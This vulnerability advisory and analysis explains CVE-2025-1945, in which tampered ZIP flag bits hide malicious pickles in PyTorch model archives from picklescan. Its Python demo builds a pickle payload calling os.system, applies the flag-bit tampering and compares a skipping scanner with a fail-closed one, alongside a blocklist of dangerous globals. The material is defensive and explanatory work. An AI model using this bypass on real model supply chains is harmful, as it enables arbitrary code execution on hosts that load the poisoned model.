CVE-2025-1945 in picklescan
Summary
by MITRE • 03/10/2025
picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping specific bits in the ZIP file headers, an attacker can embed malicious pickle files that remain undetected by PickleScan while still being successfully loaded by PyTorch's torch.load(). This can lead to arbitrary code execution when loading a compromised model.
Analysis
by VulDB Data Team • 12/29/2025
CVE-2025-1945 is a detection-bypass flaw in picklescan, a static scanner for pickle files, affecting versions before 0.0.23. It concerns how picklescan handles PyTorch model archives, which are ZIP files that carry pickled data alongside the tensor storage. An attacker who controls the archive can modify flag bits in its ZIP headers so that picklescan never inspects the pickle inside, while torch.load() still accepts the same archive. The flaw matters because picklescan is commonly used as a gate in model supply chains, for example in model registries and CI pipelines, and a scanner that reports such an archive as clean gives false assurance to everyone downstream.
The root cause is a parser differential. picklescan walks the archive with Python's standard zipfile module, and certain general purpose flag bits in the ZIP headers cause that parser to refuse or skip an entry; the scanner then has no pickle bytes to run its opcode analysis on, and the archive is reported as free of malicious content. PyTorch's own archive reader is more tolerant and still extracts and unpickles the same entry. Because only the flag bits change, the rest of the archive is intact: the pickle payload is present in full and loads normally, it simply never passes through the scanner. The general lesson is that a security scanner must fail closed. If it cannot read an entry that the consuming application will read, the correct result is an error, not a clean verdict.
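The parser differential and the fail-closed point above, as an added illustrative example in Python. This is not picklescan's or PyTorch's code: it builds a PyTorch-style archive with an archive/data.pkl entry, sets a general purpose flag bit that makes Python's zipfile refuse the entry, and compares a scanner that skips unreadable entries with one that reports them. The page does not name the bits used in the real bypass; the encryption bit (bit 0) is used here as one assumed example of a flag that zipfile enforces. The entry name, the DANGEROUS_GLOBALS blocklist and the two sample pickles are constructed for the example, and the malicious pickle is only disassembled with pickletools, never unpickled. PyTorch itself is not invoked.

```python
import io
import pickle
import pickletools
import struct
import zipfile

# Constructed sample payloads (not real model data). The malicious pickle is a
# protocol-0 pickle that would call os.system("echo pwned") if unpickled; this
# example only disassembles it with pickletools and never loads it.
BENIGN_PICKLE = pickle.dumps({"weights": [0.1, 0.2, 0.3]}, protocol=2)
MALICIOUS_PICKLE = b"cos\nsystem\n(S'echo pwned'\ntR."

# Short illustrative blocklist of (module, name) globals; real scanners use longer lists.
DANGEROUS_GLOBALS = {("os", "system"), ("builtins", "eval"), ("builtins", "exec"), ("subprocess", "Popen")}

# Assumption for this example: general purpose bit 0 (entry encrypted). zipfile refuses to
# read such an entry without a password; the page does not name the bits used in the bypass.
ENCRYPTED_FLAG_BIT = 0x0001

ENTRY_NAME = "archive/data.pkl"  # PyTorch-style location of the pickle inside the archive


def build_model_zip(payload: bytes) -> bytes:
    """Write `payload` as the pickle entry of an in-memory, uncompressed ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr(ENTRY_NAME, payload)
    return buf.getvalue()


def set_flag_bits(zip_bytes: bytes, mask: int) -> bytes:
    """OR `mask` into the general purpose flag field of every local file header
    (flags at offset 6 from the signature) and central directory header (offset 8).
    Nothing else in the archive changes, so the pickle bytes are still present.
    Assumes the stored payloads do not themselves contain the ZIP signatures."""
    data = bytearray(zip_bytes)
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = data.find(sig)
        while pos != -1:
            (flags,) = struct.unpack_from("<H", data, pos + off)
            struct.pack_into("<H", data, pos + off, flags | mask)
            pos = data.find(sig, pos + len(sig))
    return bytes(data)


def dangerous_globals(pickle_bytes: bytes) -> list:
    """Disassemble a pickle without executing it and return blocklisted globals it references.
    Handles GLOBAL and the common STACK_GLOBAL form (two string pushes right before it)."""
    ops = list(pickletools.genops(pickle_bytes))
    found = []
    for i, (op, arg, _pos) in enumerate(ops):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and i >= 2:
            module, name = ops[i - 2][1], ops[i - 1][1]
            if isinstance(module, str) and isinstance(name, str):
                found.append((module, name))
    return [g for g in found if g in DANGEROUS_GLOBALS]


def scan(zip_bytes: bytes, fail_closed: bool) -> str:
    """Return 'clean', 'malicious' or 'unreadable'.

    fail_closed=False models a scanner that silently skips entries its ZIP parser
    cannot read: the tampered pickle is never inspected and the archive looks clean.
    fail_closed=True reports any entry it cannot read, closing the parser differential."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return "unreadable" if fail_closed else "clean"
    verdict = "clean"
    with zf:
        for info in zf.infolist():
            if not info.filename.endswith(".pkl"):
                continue
            try:
                payload = zf.read(info)
            except (RuntimeError, NotImplementedError, zipfile.BadZipFile):
                if fail_closed:
                    return "unreadable"
                continue  # the bypass: the entry the loader will unpickle is skipped
            if dangerous_globals(payload):
                verdict = "malicious"
    return verdict


def demo() -> dict:
    """Verdicts for an untampered malicious archive and its flag-bit-tampered copy."""
    evil = build_model_zip(MALICIOUS_PICKLE)
    tampered = set_flag_bits(evil, ENCRYPTED_FLAG_BIT)
    return {
        "untampered": scan(evil, fail_closed=False),
        "tampered_naive": scan(tampered, fail_closed=False),
        "tampered_fail_closed": scan(tampered, fail_closed=True),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the script shows the shape of the bug: the untampered archive is flagged as malicious, the tampered copy passes the skipping scanner as clean even though the payload bytes are unchanged, and the fail-closed scanner reports it as unreadable so a pipeline can reject it. The same structure applies to any flag bit or header field where the scanner's parser is stricter than the loader's.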
The impact is the usual one for pickle. When torch.load() is called with weights_only=False, it unpickles the archive's data.pkl, and the pickle virtual machine imports and calls whatever globals the attacker placed there, so arbitrary code runs with the privileges of the process loading the model. Unpickling happens before any application code sees the object, so there is no opportunity to validate it first. This makes the flaw a model supply chain problem: a poisoned model published to a shared repository or hub, scanned as clean, and then loaded by training, evaluation or inference jobs gives the attacker code execution on every host that loads it, with the usual follow-on of credential theft, data exfiltration and lateral movement. One caveat: PyTorch 2.6 and later default to weights_only=True, which restricts unpickling to an allowlist of tensor-related types and rejects arbitrary globals; code that passes weights_only=False explicitly, or runs an older PyTorch, remains exposed.
Mitigation starts with upgrading picklescan to 0.0.23 or later, which handles these archives correctly, but a scanner upgrade alone is not a control: opcode scanning is a blocklist, and pickle scanner bypasses have recurred. Treat model files as untrusted code. Prefer torch.load(..., weights_only=True) or formats that do not execute on load, such as safetensors, and load models from untrusted sources only inside a sandbox without credentials or network access. Pin models by hash and verify signatures so that only reviewed artifacts reach production, segment model repositories, and include the ML pipeline in regular supply chain assessments. In terms of classification, this is not a path traversal (CWE-22) or resource exhaustion (CWE-400) issue; the consequence is deserialization of untrusted data (CWE-502), reached because the scanner fails open on input it cannot parse. In ATT&CK terms the relevant techniques are Supply Chain Compromise: Compromise Software Supply Chain (T1195.002) and Command and Scripting Interpreter: Python (T1059.006), not PowerShell execution or setuid abuse.